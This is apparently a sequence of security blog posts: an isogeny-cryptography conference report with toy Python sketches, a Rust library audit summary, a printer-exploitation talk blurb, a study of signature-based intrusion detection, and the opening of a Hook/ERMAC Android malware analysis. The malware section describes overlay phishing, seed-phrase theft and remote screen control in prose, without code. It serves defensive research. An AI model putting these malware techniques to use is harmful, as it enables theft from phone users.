I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who organised the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.
As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).
In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple but generic group structure of an elliptic curve, together with efficient arithmetic from particular curve models, has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of them. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.
Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has led to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.
The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather pick our own adventure from the program.
For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:
Applications of Algebraic Geometry to Post-Quantum Cryptology.
Elliptic Curves and Pairings in Cryptography.
Applications of Isogenies in Cryptography.
Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.
For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference, which is available on Elliptic News. As a complement to what has already been written, the aim of this blog post is to give a general impression of what people are thinking about and the research which is currently ongoing.
In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge of new protocols being put forward which study isogenies between abelian varieties, generalising away from dimension-one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm SQIsign has been submitted to NIST’s recent call for new quantum-safe signatures. Many talks through the week focused on algorithmic and parameter improvements to aid the submission process.
What is an isogeny?
For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography can be understood as long as you have a good idea of how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I end up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.
Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.
A little more specifically, for those interested: an isogeny is a special map which respects both the geometric structure of elliptic curves (it maps one projective curve to another) and the algebraic group structure which cryptographers hold so dear (mapping the sum of two points gives the same result as summing the two mapped points). Concretely, an isogeny is a (non-constant) rational map which sends the identity of one curve to the identity of the other.
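For readers who like to experiment, the “walking” metaphor can be made concrete with a toy sketch in plain Python. It walks the 2-isogeny graph of supersingular j-invariants over GF(p²) using the classical level-2 modular polynomial; the tiny prime p = 83, the starting point j = 1728 and the brute-force root search are purely illustrative assumptions — real protocols use enormous primes and proper root-finding, and never enumerate the field.

```python
# Toy walk on the 2-isogeny graph of supersingular curves over GF(p^2).
# Phi_2(j1, j2) = 0 exactly when j1 and j2 are 2-isogenous, so stepping
# through roots of Phi_2 "walks" between curves. p = 83 (p = 3 mod 4, so
# j = 1728 is supersingular) is a toy choice; real schemes use huge primes.

p = 83

class Fp2:
    """Elements a + b*i of GF(p^2), with i^2 = -1 (valid as p = 3 mod 4)."""
    def __init__(self, a, b=0):
        self.a, self.b = a % p, b % p
    def __add__(self, o): return Fp2(self.a + o.a, self.b + o.b)
    def __sub__(self, o): return Fp2(self.a - o.a, self.b - o.b)
    def __mul__(self, o):
        return Fp2(self.a * o.a - self.b * o.b, self.a * o.b + self.b * o.a)
    def __eq__(self, o): return self.a == o.a and self.b == o.b
    def __hash__(self): return hash((self.a, self.b))
    def __repr__(self): return f"{self.a} + {self.b}*i"

def phi2(x, y):
    """The classical modular polynomial Phi_2, reduced into GF(p^2)."""
    c = Fp2
    return (x*x*x + y*y*y - x*x*y*y
            + c(1488) * (x*x*y + x*y*y)
            - c(162000) * (x*x + y*y)
            + c(40773375) * (x*y)
            + c(8748000000) * (x + y)
            - c(157464000000000))

def neighbours(j):
    """The j-invariants 2-isogenous to j (brute-force root search)."""
    return [Fp2(a, b) for a in range(p) for b in range(p)
            if phi2(j, Fp2(a, b)) == Fp2(0)]

def walk(j_start, steps):
    """A deterministic walk; a real secret walk would choose randomly."""
    path = [j_start]
    for _ in range(steps):
        options = [j for j in neighbours(path[-1])
                   if len(path) < 2 or j != path[-2]]  # avoid backtracking
        path.append((options or neighbours(path[-1]))[0])
    return path

path = walk(Fp2(1728), 5)  # the secret is the path; public is its endpoint
```

Here the secret path has only five steps; at cryptographic sizes, recovering the path from its two endpoint curves alone is believed hard for both classical and quantum computers.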
Isogenies in Higher Dimensions
For the past year, isogeny-based cryptography has been undergoing a revolution after a series of papers appeared which broke the key-exchange protocol SIDH. The practical break of SIDH was particularly spectacular, as it essentially removed the key-encapsulation mechanism SIKE from the NIST post-quantum project, which only weeks before had chosen it to continue to the fourth round as a prospective alternative candidate to Kyber.
For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.
The key to all of the attacks was that, given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description of isogenies above was a little too restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.
Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.
If you want to imagine these higher-dimensional varieties, one way is to think about surfaces in three-dimensional space which have some “holes” or “handles”. A dimension-one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options: the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two-dimensional surfaces which in some sense factor into two dimension-one surfaces (or abstractly, as a pair of donuts!).
The core computation of the attack is a two-dimensional isogeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many many steps of the generic surface, and ends on another special surface which factors into donuts again. A natural question to ask is: how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is usually very very large, it’s essentially impossible to accidentally land on one of these products.
With this as background, we can now ask a few natural questions:
When can we compute isogenies between elliptic products?
Why do we want to compute isogenies between elliptic products?
How can we ask computers to compute isogenies between elliptic products?
The question of when we find these very special isogenies between elliptic products was answered by Ernst Kani in 1997, and it was his lemma which illuminated the method of attacking SIDH. Kani’s criterion describes how, when a set of one-dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, a specially chosen two-dimensional isogeny will walk between elliptic products.
This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.
Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide the parts of the information Kani’s criterion requires in such a way that an attacker can no longer guess them piece by piece. One method is to take the torsion-point information you need and mask it by multiplying the points by some secret scalar.
Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complemented very nicely by a talk by Luca De Feo the following day, giving another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.
Although breaking a well-known and long-standing cryptographic protocol is more than enough motivation to study these isogenies, continued research on computing higher-dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, which was addressed by Benjamin Wesolowski, who discussed SQIsignHD, and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of their own, we’ll jump straight to FESTA.
The essence of FESTA is to find a way to configure some one-dimensional isogenies during keygen and encryption such that during decryption, the holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack recovers secrets about the one-dimensional isogenies, encryption is then a case of using some message to describe the isogeny path; as decryption recovers this path, it also recovers the secret message. The core of how FESTA works is tied up in the categories of masking that Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together: by using commuting masking matrices, encryption masks away certain critical data, and during decryption the masking can be removed thanks to the commutativity.
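The “commuting masks” trick can be illustrated with a deliberately simplified sketch. FESTA’s real masks are secret diagonal (or circulant) matrices acting on torsion points modulo a large order; below, hypothetical small numbers stand in for that data, and the only point being demonstrated is that commuting masks can be peeled off in either order.

```python
# Toy illustration (not FESTA itself) of why commuting masking matrices
# can be stripped off again during decryption. We mask a vector mod a
# small N with diagonal matrices; diagonal matrices always commute.

N = 2**8 * 3**5  # illustrative modulus; FESTA uses cryptographic sizes

def diag_apply(d, v):
    """Apply the diagonal matrix diag(d[0], d[1]) to a vector mod N."""
    return ((d[0] * v[0]) % N, (d[1] * v[1]) % N)

def diag_inv(d):
    """Invert diag(d[0], d[1]) mod N (entries must be units mod N)."""
    return (pow(d[0], -1, N), pow(d[1], -1, N))

A = (5, 7)      # key holder's secret mask (entries coprime to N)
B = (11, 13)    # encryptor's secret mask
v = (123, 456)  # stand-in for the torsion data being masked

# Masking in either order gives the same result: the matrices commute.
assert diag_apply(A, diag_apply(B, v)) == diag_apply(B, diag_apply(A, v))

# The key holder can remove their own mask A without ever knowing B,
# leaving only B applied -- exactly as if A had never been there.
masked = diag_apply(B, diag_apply(A, v))
assert diag_apply(diag_inv(A), masked) == diag_apply(B, v)
```

The design point is that commutativity lets each party undo only their own mask, in any order, which is what decryption in FESTA exploits at a much grander scale.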
The idea of using the SIDH attacks to build a quantum-safe public-key encryption protocol is not new: a very similar protocol was described in Séta. However, due to the inefficiency of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial-time algorithms for the attack.
To close out the third isogeny session, I then did my best to talk about the how. Given the motivation that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough to be suitable for cryptographic protocols? The talk was split between the three categories of isogenies we need:
The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
All other steps are then isogenies between these generic two-dimensional surfaces. These are described by the Richelot correspondence, which dates back to the 19th century and is surprisingly simple considering the work it does.
I described some new results which allow for particularly efficient gluing isogenies, and that working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done and I hope as a community we can continue optimising these isogenies.
In summary, the SIDH attacks have introduced a whole new toolbox of isogenies, and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis of isogeny-based protocols is of course undergoing its own revolution, and understanding how higher-dimensional structures can make or break new schemes is vibrant and exciting work.
An Isogeny Walk back to NIST
Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared when round one came online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow, protocol which was introduced in 2020 and followed up with a paper containing various performance enhancements in 2022.
Underlying SQIsign is a fairly simple idea. The signer computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curves, only the signer knows the special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only compute if they know this secret isogeny.
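SQIsign’s sigma protocol is built from isogenies and endomorphism rings, but the commit–challenge–response shape it follows is classical. As a stand-in illustration only, here is a toy Schnorr-style identification made non-interactive with Fiat–Shamir; the tiny group parameters are illustrative assumptions, and nothing here is SQIsign’s actual mathematics — only the shape of “prove you hold the secret without revealing it” carries over.

```python
import hashlib
import secrets

# Toy Schnorr-style sigma protocol (commit-challenge-response), made
# non-interactive via Fiat-Shamir. Analogy only: in SQIsign the secret
# is an isogeny and the public key is the end curve; here the secret is
# a discrete log. All sizes below are toy-scale and insecure.

q = 101                              # prime order of the subgroup
p_mod = 607                          # prime with q | p_mod - 1 (606 = 2*3*101)
g = pow(3, (p_mod - 1) // q, p_mod)  # generator of the order-q subgroup

sk = secrets.randbelow(q - 1) + 1    # secret ("the secret isogeny")
pk = pow(g, sk, p_mod)               # public key ("the ending curve")

def challenge(commit):
    """Fiat-Shamir: derive the challenge by hashing the commitment."""
    h = hashlib.sha256(str(commit).encode()).digest()
    return int.from_bytes(h, "big") % q

def prove():
    """Commit to a random value, then respond using the secret."""
    r = secrets.randbelow(q - 1) + 1
    commit = pow(g, r, p_mod)
    resp = (r + challenge(commit) * sk) % q
    return commit, resp

def verify(commit, resp):
    """g^resp == commit * pk^c holds iff the response used sk."""
    c = challenge(commit)
    return pow(g, resp, p_mod) == (commit * pow(pk, c, p_mod)) % p_mod
```

Only someone holding `sk` can produce a valid `resp` for the hashed challenge, which mirrors how a SQIsign signer answers a challenge only they can answer thanks to their secret isogeny.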
Concretely, SQIsign is built on knowledge of the endomorphism ring of an elliptic curve: the set of isogenies from a curve to itself. The starting curve is chosen so that everyone knows its endomorphism ring. The trick in SQIsign is that although it generally seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. The secret isogeny therefore allows the signer to “transport” the endomorphism ring from the starting curve to their public curve, so the endomorphism ring of the end curve is known to no one except the signer.
Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems which are hard on elliptic curves become easy, and once the right information is recovered, the Deuring correspondence maps everything back to elliptic curve world so the protocol can continue. Ultimately, all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, a signer can compute things from the public curve which nobody else can feasibly do.
There’s a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn alongside an implementation, I worked with some collaborators to write a verbose SageMath implementation following the first SQIsign paper. A blog post discussing the implementation challenges, Learning to SQI, was written, and the code is on GitHub.
The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice-based scheme chosen at the end of round three, which at the same security level has public keys of 1312 bytes and signatures of 2420 bytes! However, the main drawback is that SQIsign is orders of magnitude slower than Dilithium, and the complex, heuristic algorithms in some of the quaternion algebra pieces mean that writing a safe and side-channel-resistant implementation is extremely challenging.
At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.
On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which make the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is computing large-prime-degree isogenies, which occurs because SQIsign requires both p+1 and p-1 to have many small factors, and for large p it is tough to ensure all these factors stay as small as possible. Michael discussed several tricks which can be used to find twin smooth numbers, and how different techniques are beneficial depending on the bit-length of p. The upshot is that the culmination of all these ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.
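The “twin smooth” idea can be sketched naively: if n and n+1 are both smooth and p = 2n + 1 happens to be prime, then p − 1 = 2n and p + 1 = 2(n + 1) are both smooth, which is the shape SQIsign wants. The brute-force trial division below is an illustrative toy — the real parameter searches operate at roughly 256-bit sizes with far cleverer machinery.

```python
# Toy search for "twin smooth" integers: consecutive pairs (n, n+1)
# that are both B-smooth. Trial division only works at toy sizes and
# is purely illustrative of the concept.

def is_smooth(n, B):
    """True if every prime factor of n is <= B (naive trial division)."""
    d = 2
    while d * d <= n:
        while n % d == 0:
            n //= d
        d += 1
    return n <= B  # whatever remains is the largest prime factor

def twin_smooths(bound, B):
    """All n < bound with n and n+1 both B-smooth."""
    return [n for n in range(2, bound)
            if is_smooth(n, B) and is_smooth(n + 1, B)]

# Example twin: 4374 = 2 * 3^7 and 4375 = 5^4 * 7 are both 7-smooth,
# so p = 2 * 4374 + 1 would give p - 1 and p + 1 both smooth.
```

At cryptographic sizes such twins become extremely rare, which is exactly why the search techniques Michael described are needed.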
Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign, focusing on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements allowing parameter sets up to NIST level V, but the protocol is still a long way from competing with the lattice protocols that have already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.
To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research that adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifting the protocol’s complexity into verification.
The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but its security proofs become much more straightforward, which should go a long way towards showing that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four-dimensional isogeny. These isogenies are theoretically described, but a full implementation of them is still a work in progress. Understanding precisely how verification time is affected is key to understanding whether the HD remake of SQIsign could either replace or exist alongside the original scheme.
Acknowledgements
Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.
During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.
The three primary code repositories in scope for this review were:
The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.
Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk detailed how NCC Group’s Exploit Development Group (EDG) was able to exploit two different PostScript vulnerabilities in Lexmark printers at Pwn2Own Toronto 2022. The presentation is a good primer for those interested in further researching the Lexmark PostScript stack, and also for those interested in how PostScript interpreter exploitation can be approached in general.
Mathew Vermeer is a doctoral candidate at the Organisation Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he has received both a BSc degree in Computer Science and Engineering, as well as an MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings. In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.
Introduction
The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field, it’s been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost as long [1]. Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that tell the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4]. On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets. So how much of this push is simply hype, and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security?
To answer this, we analyzed alert and incident data from Fox-IT, along with the many proprietary and commercial rulesets employed there, spanning mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.
NIDS environment
First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, during which they are tweaked until their performance is deemed acceptable; how long this takes can vary depending on the novelty, severity, etc., of the threat a rule is trying to detect. Once that condition is reached, the rules are added to the production environment, where they can again be modified based on their performance in a real-world setting.
Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.
Custom ruleset important for proper functioning of NIDS
One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positives are something rule developers and SOC analysts strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS. We found that the custom ruleset Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than that of the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team before the rules are introduced into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand). The Fox-IT ruleset is also much smaller than the commercial rulesets: around 2,000 rules versus tens of thousands of commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they play a complementary role to the commercial rules, which is something we explore in a different study.
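As a reminder of the metric itself, precision is the share of raised detections that turn out to be real. The TP/FP counts in the snippet below are invented purely to illustrate the formula — the study reports only the resulting averages.

```python
# Precision = TP / (TP + FP): the fraction of raised detections that
# were real. Unlike plain accuracy, it directly penalises false positives.
# NOTE: the counts here are hypothetical, chosen only to reproduce the
# average precision values quoted in the text.

def precision(true_positives: int, false_positives: int) -> float:
    return true_positives / (true_positives + false_positives)

assert precision(74, 26) == 0.74   # ~ the proprietary ruleset's average
assert precision(65, 35) == 0.65   # ~ one of the commercial rulesets
```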
Newest rules produce most incidents
The figure below shows the average age of rules plotted against the number of incidents that a rule of that age triggers on average per week. For instance, the spike on the left represents rules that are a week old: such a week-old rule will, on average, produce around four incidents per week. In other words, it is the newest rules that produce the most incidents. The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to keep their organization and their clients secure. And secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at another type of NIDS optimization: pruning stale rules to reduce the performance burden. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, the severity of the threat it is designed to detect, its precision (or any other metric), etc.
99.8% of (detected) true positive incidents caught before becoming successful attacks
Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. Across the 13 years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They condensed these 62 million alerts into 150,000 incidents, which were further condensed into 69,000 true positive incidents. And finally, out of those 69,000, only 106 turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations that the SOC aims to protect on a daily basis. I’ll point out, though, that this number obviously ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so, we’re confident in the accuracy of the computed percentage.
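The quick math behind that percentage can be spelled out as follows (the counts are the ones reported above; the method name is ours):

```java
// Share of true positive incidents caught before turning into successful attacks.
public class DetectionFunnel {
    public static double caughtInTimePercentage(long truePositiveIncidents, long successfulAttacks) {
        return 100.0 * (truePositiveIncidents - successfulAttacks) / truePositiveIncidents;
    }

    public static void main(String[] args) {
        // 69,000 true positive incidents, of which 106 became successful attacks.
        System.out.println(caughtInTimePercentage(69_000, 106)); // ~99.85
    }
}
```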
Conclusion
So, with all of these results, we demonstrate that signature-based systems are still effective, provided that they are managed properly, for example by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other types of intrusion detection, whether network-based, host-based or application-based. Only once that comparison is done will we be able to determine whether signature-based systems really do need to be phased out as archaic and obsolete pieces of technology, or whether they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable. This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).
[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.
[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).
[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.
[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.
Authored by Joshua Kamp (main author) and Alberto Segura.
Summary
Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.
After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.
Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.
Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70,000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.
The launch of Hook
On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.
Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.
Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7,000 per month.
The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.
Command comparison
Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.
While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis led us to find several new commands and features in Hook, as can be seen just by looking at the number of commands implemented in each variant.
| Sample | Number of commands |
| --- | --- |
| Hook sample #1 | 58 |
| Hook sample #2 | 68 |
| ERMAC samples #1 & #2 | 30 |
All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.
Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.
When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).
Hook command: start_vnc
The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.
